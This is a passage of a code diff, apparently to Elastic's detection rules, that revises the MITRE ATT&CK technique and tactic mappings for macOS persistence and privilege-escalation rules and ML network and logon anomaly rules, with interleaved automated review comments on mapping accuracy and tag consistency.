"https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.014" +name = "Emond" +reference = "https://attack.mitre.org/techniques/T1546/014/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" 
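Review bot: The new Execution mapping adds the `T1059.001` PowerShell sub-technique to a macOS emond rule; to my recollection that sub-technique carries a Windows-only platform in ATT&CK, so unless the rule's query (outside this hunk) explicitly matches `pwsh`, the mapping is worth re-checking. The same addition is made in the hunk at L4156. The remaining `T1059.002`, `T1059.004` and `T1059.006` entries already cover the interpreters a macOS emond rule would plausibly observe.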
diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index 5e06d5edddf..aff54dfac33 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,19 +97,36 @@ In macOS environments, the root account is typically disabled to enhance securit [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 49dd1c7435c..a6a9cae0368 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -101,36 +101,41 @@ Launch agents and daemons in macOS are background services that start at login o [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index 46944a678eb..d790a233ae0 100644 --- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -101,26 +101,31 @@ Folder Action scripts on macOS automate tasks by executing scripts when folder c [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 40020db35c3..4de5c5b0c7f 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,14 +108,18 @@ In macOS environments, login and logout hooks are scripts executed automatically [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - 
diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index 7603cbada1f..e85b2d8c0c3 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -67,26 +67,36 @@ event.category:file and host.os.type:macos and not event.type:"deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1647" name = "Plist File Modification" reference = "https://attack.mitre.org/techniques/T1647/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_manual_chromium_extension_loading.toml b/rules/macos/persistence_manual_chromium_extension_loading.toml index 245e2cd90cc..07e4a9a4fee 100644 --- a/rules/macos/persistence_manual_chromium_extension_loading.toml +++ b/rules/macos/persistence_manual_chromium_extension_loading.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -86,25 +86,43 @@ process where host.os.type == "macos" and event.action == "exec" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1176" +name = "Software Extensions" +reference = "https://attack.mitre.org/techniques/T1176/" - [[rule.threat.technique]] - name = "Software Extensions" - id = "T1176" - reference = "https://attack.mitre.org/techniques/T1176/" +[[rule.threat.technique.subtechnique]] +id = "T1176.001" +name = "Browser Extensions" +reference = "https://attack.mitre.org/techniques/T1176/001/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Credential Access" - id = "TA0006" - reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique]] +id = "T1185" +name = "Browser Session Hijacking" +reference = "https://attack.mitre.org/techniques/T1185/" - [[rule.threat.technique]] - name = "Steal Web Session Cookie" - id = "T1539" - reference = "https://attack.mitre.org/techniques/T1539/" +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml index 2c5cd8c4634..af2fe4da7d7 100644 --- a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml 
+++ b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -73,20 +73,26 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 44791980400..f3d28e5dedf 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -101,14 +101,18 @@ file where host.os.type == "macos" and event.action == "modification" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.002" +name = "Screensaver" +reference = "https://attack.mitre.org/techniques/T1546/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml b/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml index fac9eb9b6b7..541eca18fa0 100644 --- a/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml +++ b/rules/macos/persistence_suspicious_file_creation_via_pkg_install_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -88,17 +88,35 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.016" +name = "Installer Packages" +reference = "https://attack.mitre.org/techniques/T1546/016/" - [[rule.threat.technique.subtechnique]] - name = "Installer Packages" - id = "T1546.016" - reference = "https://attack.mitre.org/techniques/T1546/016/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml index eff66a14bca..20a55491fb9 100644 --- a/rules/macos/persistence_via_atom_init_file_modification.toml +++ b/rules/macos/persistence_via_atom_init_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -102,14 +102,18 @@ Atom, a popular text editor, allows customization via the `init.coffee` script, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml index ca5bd4627c0..154da364854 100644 --- a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml +++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -99,26 +99,41 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + +[[rule.threat.technique.subtechnique]] +id = "T1548.004" +name = "Elevated Execution with Prompt" +reference = "https://attack.mitre.org/techniques/T1548/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml index f295bcc10c8..495b1af36f8 100644 --- a/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml +++ b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -104,6 +104,7 @@ In macOS environments, the `security_authtrampoline` process is used to execute [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" 
@@ -113,27 +114,46 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.004" name = "Elevated Execution with Prompt" reference = "https://attack.mitre.org/techniques/T1548/004/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.006" +name = "Python" +reference = "https://attack.mitre.org/techniques/T1059/006/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/privilege_escalation_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml index 0b7b102ae56..9652b050d48 100644 --- a/rules/macos/privilege_escalation_local_user_added_to_admin.toml +++ b/rules/macos/privilege_escalation_local_user_added_to_admin.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -101,19 +101,28 @@ In macOS environments, tools like `dscl` and `dseditgroup` manage user group mem [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/macos/privilege_escalation_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml index eb4046a403c..70e4595fc79 100644 --- a/rules/macos/privilege_escalation_user_added_to_admin_group.toml +++ b/rules/macos/privilege_escalation_user_added_to_admin_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["jamf_protect"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.investigate]] 
@@ -103,19 +103,28 @@ configuration where host.os.type == "macos" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.003" name = "Local Accounts" reference = "https://attack.mitre.org/techniques/T1078/003/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml index 677898f0c23..6e0dfd19402 100644 --- a/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml +++ b/rules/ml/command_and_control_ml_packetbeat_dns_tunneling.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
@@ -116,14 +116,36 @@ DNS tunneling exploits the DNS protocol to covertly transmit data between a comp - Coordinate with IT and security teams to apply necessary patches and updates to the affected system to close any vulnerabilities exploited by the attacker.""" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml b/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml index bc5e9a0574f..f2fe9d6cf36 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_dns_question.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
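Review bot: A new `[[rule.threat]]` entry with tactic "Exfiltration" (TA0010) is added, but the rule's `tags` array is outside the hunk and no tags hunk is shown for this file, so unless the array already carries `"Tactic: Exfiltration",` the tag/tactic consistency test will flag the rule. The same gap applies to the other hunks in this series that introduce a tactic the file did not previously map: rare_dns_question (Exfiltration, Initial Access), rare_urls (Initial Access), spike_in_logon_events (Initial Access), anomalous_metadata_process (Discovery), anomalous_script (Defense Evasion), rare_source_ip_for_a_user and rare_user_type10_remote_login (Lateral Movement), high_count_events_for_a_host_name (Command and Control, Discovery) and rare_destination_country (Execution). For the hunks whose `@@` context reads `tags = [` and whose first context line is `type = "machine_learning"`, the tags array ends immediately before the hunk and is visibly untouched. Adding the matching `Tactic: <name>` line to each affected `tags` array, in the same commit, keeps the threat mapping and the tag-based filtering in sync.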
@@ -119,19 +119,49 @@ DNS is crucial for translating domain names into IP addresses, enabling network - Update and enhance DNS monitoring rules to detect similar unusual DNS activity in the future, ensuring rapid identification and response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.004" name = "DNS" reference = "https://attack.mitre.org/techniques/T1071/004/" - +[[rule.threat.technique]] +id = "T1568" +name = "Dynamic Resolution" +reference = "https://attack.mitre.org/techniques/T1568/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml index 390ff8b41e2..a48e00fa0ee 100644 --- a/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml +++ b/rules/ml/command_and_control_ml_packetbeat_rare_urls.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 
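Review bot: The Phishing (T1566) entry under Initial Access (TA0001) is an indirect mapping for a rule whose signal is a rare DNS question: the data source evidences name resolution, not lure delivery, so the mapping is presumably a downstream inference rather than something the job observes. ATT&CK mappings are most useful when each technique is one the rule's data can actually evidence; the C2 entries (T1071.004, T1568) and the Exfiltration entry already capture the DNS-abuse intent. The Drive-by Compromise (T1189) entry added to rare_urls in the next file section has the same character. If the Initial Access mappings are kept, a one-line comment above the block stating the rationale would help future reviewers, e.g. `# Initial Access: rare domains are commonly first seen when a lure resolves; kept for triage context`.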
@@ -123,19 +123,36 @@ The 'Unusual Web Request' detection leverages machine learning to identify rare - Review and update firewall and intrusion detection/prevention system (IDS/IPS) rules to better detect and block uncommon URLs associated with command-and-control activities.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" - +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1189" +name = "Drive-by Compromise" +reference = "https://attack.mitre.org/techniques/T1189/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml index 254e2a72443..30ca95d7d81 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_failed_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -133,14 +133,23 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml index e2c5d123724..9fad9a30e9a 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
@@ -135,14 +135,31 @@ The 'Spike in Logon Events' detection leverages machine learning to identify ano - Enhance monitoring and alerting mechanisms to detect similar spikes in logon events in the future, ensuring rapid response to potential threats.""" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml index 3305439fe96..1e36cec12c9 100644 --- a/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml +++ b/rules/ml/credential_access_ml_auth_spike_in_logon_events_from_a_source_ip.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/10" integration = ["auditd_manager", "endpoint", "system"] maturity = "production" -updated_date = "2024/06/18" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 
